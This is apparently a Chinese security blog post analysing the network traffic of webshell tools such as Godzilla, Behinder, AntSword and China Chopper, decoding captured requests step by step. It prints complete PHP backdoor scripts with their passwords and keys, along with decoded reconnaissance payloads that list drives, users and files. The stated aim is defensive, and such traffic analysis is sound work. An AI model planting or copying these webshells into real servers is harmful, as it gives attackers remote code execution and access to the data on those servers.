免责声明:本文仅作分享!
对于常见的webshell工具,就要知攻善防;后门脚本的执行导致webshell的连接,对于默认的脚本要了解,才能更清晰,更方便应对。
(这里仅针对部分后门代码进行流量分析)
瑕疵处,请提出您宝贵的意见~
哥斯拉流量
3.x - 4.x:
要知道密码,密钥,才能将传输的密文转换为明文。
流量包
POST /uploads/shell.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Cookie: PHPSESSID=e30bpdvj90mp4gcgo3ukjcoa3t;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Host: 192.168.155.22
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 1413
hacker=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&hhhhacker=LOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3DHTTP/1.1 200 OK
Host: 192.168.155.22
Date: Tue, 08 Oct 2024 08:57:26 GMT
Connection: close
X-Powered-By: PHP/8.2.23
Set-Cookie: PHPSESSID=e30bpdvj90mp4gcgo3ukjcoa3t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
7ba0e8f6b3da4a83LOk/NjEyMDhkNkj+fav75hiqH9YzMocx4BtpMDVm1f2ed56a3adc98dc
对传输的数据进行解密:
hacker=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&hhhhacker=LOk%2FNjEyMDhkNSj%2BeJf7%2B3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q%2BMYHqr%2BeX0b5m%2FW%2B0pmZ1aAZACuehv4%2Bn%2FJL%2FkuVddg2HueKnpA%2F%2F39dah%2BYjCIqf6FYmI3Ng%3D%3D
--->
hacker=eval(base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7ciMmVDMjVDZ4AjMxYzNiNzNn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7ciclt2YhhGaoh2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD'))));&hhhhacker=LOk/NjEyMDhkNSj+eJf7+3gH5VBRUhj2NOUuZmUsfGZjsBh9HeAfF0virBj8q+MYHqr+eX0b5m/W+0pmZ1aAZACuehv4+n/JL/kuVddg2HueKnpA//39dah+YjCIqf6FYmI3Ng==
--->
DQpAc2Vzc2lvbl9zdGFydCgpOw0KQHNldF90aW1lX2xpbWl0KDApOw0KQGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIGVuY29kZSgkRCwkSyl7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7DQogICAgICAgICRjID0gJEtbJGkrMSYxNV07DQogICAgICAgICREWyRpXSA9ICREWyRpXV4kYzsNCiAgICB9DQogICAgcmV0dXJuICREOw0KfQ0KJHBhc3M9J2hoaGhhY2tlcic7DQokcGF5bG9hZE5hbWU9J3BheWxvYWQnOw0KJGtleT0nNzNiNzYxMjA4ZDVjMDVmMic7DQppZiAoaXNzZXQoJF9QT1NUWyRwYXNzXSkpew0KICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOw0KICAgIGlmIChpc3NldCgkX1NFU1NJT05bJHBheWxvYWROYW1lXSkpew0KICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7DQogICAgICAgIGlmIChzdHJwb3MoJHBheWxvYWQsImdldEJhc2ljc0luZm8iKT09PWZhbHNlKXsNCiAgICAgICAgICAgICRwYXlsb2FkPWVuY29kZSgkcGF5bG9hZCwka2V5KTsNCiAgICAgICAgfQ0KCQlldmFsKCRwYXlsb2FkKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDAsMTYpOw0KICAgICAgICBlY2hvIGJhc2U2NF9lbmNvZGUoZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDE2KTsNCiAgICB9ZWxzZXsNCiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2Upew0KICAgICAgICAgICAgJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV09ZW5jb2RlKCRkYXRhLCRrZXkpOw0KICAgICAgICB9DQogICAgfQ0KfQ0K
继续解密,得后门脚本:
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='hhhhacker';
$payloadName='payload';
$key='73b761208d5c05f2';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
----》得到
$pass='hhhhacker';
$key='73b761208d5c05f2';
在流量包中找传输的数据,进行相应的解密:
7ba0e8f6b3da4a83LOk/NjEyMDhkNtCBGq4a12ErNDRqF5fqqKn31KfS2Mf/wOPUPfWS1Bz2gcgHsZD9S7WdbBQcSwNKNdj0kcACNzNi1f2ed56a3adc98dc
工具解密
冰蝎流量
3.x:
base64 ,AES(iv + key), base64
后门代码
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
解密: base64 ,AES(iv + key), base64
(IV默认为 0-9 a-f)
解密
---》 最后返回的数据,再base64一下即可。
蚁剑流量
流量包
POST /1.php HTTP/1.1
Host: 192.168.19.128
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1668
Connection: close
raw=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmI2OTdiZCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICIzOSIuIjM3MCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMzdkMGNlIi4iZDBlYWZiIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKCREPT0iIikkRD1kaXJuYW1lKCRfU0VSVkVSWyJQQVRIX1RSQU5TTEFURUQiXSk7JFI9InskRH0JIjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJDIiwiWiIpYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO31lbHNleyRSLj0iLyI7fSRSLj0iCSI7JHU9KGZ1bmN0aW9uX2V4aXN0cygicG9zaXhfZ2V0ZWdpZCIpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6IiI7JHM9KCR1KT8kdVsibmFtZSJdOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iCXskc30iO2VjaG8gJFI7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs%3D&x=%40eval(%40base64_decode(%24_POST%5B'raw'%5D))%3B
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Wed, 13 Nov 2024 03:13:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.29
39370RDovcGhwc3R1ZHlfcHJvL1dXVy9kaWd1bwlDOkQ6CVdpbmRvd3MgTlQgREVTS1RPUC1QRVNMNURSIDYuMiBidWlsZCA5MjAwIChVbmtub3cgV2luZG93cyB2ZXJzaW9uIEJ1c2luZXNzIEVkaXRpb24pIGk1ODYJQWRtaW5pc3RyYXRvcg==37d0ced0eafb
解码:
(注意前几位为干扰字符)
@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.b697bd";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "39"."370";echo @asenc($output);echo "37d0ce"."d0eafb";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e-6····5·····························
数据传输方式
--根据对应的编码,进行解码。
天蝎流量
后门代码
<?php
@error_reporting(0);
session_start();
$key="900bc885d7553375";
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(isset($post))
{
$datas=explode("\n",$post);
$code=$datas[0];
$t="base64_"."decode";
$code=$t($code."");
for($i=0;$i<strlen($code);$i++) {
$code[$i] = $code[$i]^$key[$i+1&15];
}
$arr=explode('|',$code);
$func=$arr[0];
if(isset($arr[1])){
$p=$arr[1];
class C{public function __construct($p) {eval($p."");}}
@new C($p);
}
}
?>
---》从中我们可以看出 key ,base64
密文:
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
工具解密:
再base64:
error_reporting(0);
header('Content-Type: text/html; charset=UTF-8');
function getSafeStr($str){
$s1 = iconv('utf-8','gbk//IGNORE',$str);
$s0 = iconv('gbk','utf-8//IGNORE',$s1);
if($s0 == $str){
return $s0;
}else{
return iconv('gbk','utf-8//IGNORE',$str);
}
}
function getgbkStr($str){
$s0 = iconv('gbk','utf-8//IGNORE',$s1);
$s1 = iconv('utf-8','gbk//IGNORE',$str);
if($s1 == $str){
return $s1;
}else{
return iconv('utf-8','gbk//IGNORE',$str);
}
}
function main($path = "")
{
if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
{
for($i=65;$i<=90;$i++)
{
$drive=chr($i).':\\';
file_exists($drive) ? $driveList=$driveList.$drive.",":'';
}
}
else
{
$driveList="/";
}
$currentPath=getcwd()."/";
$result=$driveList."\r\n".$currentPath."\r\n";
$path=getgbkStr($path);
if($path == "") $path = getcwd()."/";
$allFiles = scandir($path);
foreach ($allFiles as $fileName) {
$fullPath = $path . $fileName;
if($fileName!='..'&&$fileName!='.'){
if (!function_exists("mb_convert_encoding"))
{
$fileName=getSafeStr($fileName);
}
else
{
$fileName=mb_convert_encoding($fileName, 'UTF-8', mb_detect_encoding($fileName, array("UTF-8","auto")));
}
if (is_file($fullPath)) {
$result=$result.$fileName;
} else {
$result=$result."dic:".$fileName;
}
$result=$result."\t".filesize($fullPath);
$result=$result."\t".substr(base_convert(@fileperms($fullPath),10,8),-4);
$result=$result."\t".date("Y-m-d H:i:s", filemtime($fullPath))."\n";
}
}
echo encrypt($result, $_SESSION['k']);
}
function encrypt($data,$key)
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
$randmystr="sfbygfxohbkbt";
main($path="C:/");
菜刀流量
主要就是一句话密码,base64
z0,z1,z2 等等 传输返回的数据。